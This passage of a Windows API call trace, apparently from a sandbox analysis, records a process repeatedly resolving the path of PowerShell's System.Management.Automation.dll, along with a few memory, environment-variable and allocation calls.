lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.230] GetLastError () returned 0xcb [0154.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.230] GetLastError () returned 0xcb [0154.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.230] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.231] GetLastError () returned 0xcb [0154.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.263] GetLastError () returned 0xcb [0154.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.263] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.264] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.265] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.266] GetLastError () returned 0xcb [0154.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.267] GetLastError () returned 0xcb [0154.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.267] GetLastError () returned 0xcb [0154.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.267] GetLastError () returned 0xcb [0154.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.267] GetLastError () returned 0xcb [0154.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.279] GetLastError () returned 0xcb [0154.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.279] GetLastError () returned 0xcb [0154.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.279] GetLastError () returned 0xcb [0154.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.279] GetLastError () returned 0xcb [0154.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.351] GetLastError () returned 0xcb [0154.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.352] GetLastError () returned 0xcb [0154.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.352] GetLastError () returned 0xcb [0154.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.352] GetLastError () returned 0xcb [0154.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.352] GetLastError () returned 0xcb [0154.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0154.352] GetLastError () returned 0xcb [0154.352] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.354] GetLastError () returned 0xcb [0154.376] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.417] GetLastError () returned 0xcb [0154.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.421] GetLastError () returned 0xcb [0154.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.424] GetLastError () returned 0xcb [0154.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.430] GetLastError () returned 0xcb [0154.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.433] GetLastError () returned 0xcb [0154.449] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.451] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.599] GetLastError () returned 0xcb [0154.676] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0154.718] GetLastError () returned 0xcb [0155.332] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x500768 [0155.333] GetLastError () returned 0x0 [0155.334] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x5007f0 [0155.334] GetLastError () returned 0x0 [0155.600] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.676] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.677] VirtualQuery (in: lpAddress=0x12cfa0, lpBuffer=0x12dfa0, dwLength=0x1c | out: lpBuffer=0x12dfa0*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0155.678] VirtualQuery (in: lpAddress=0x12c654, lpBuffer=0x12d654, dwLength=0x1c | out: 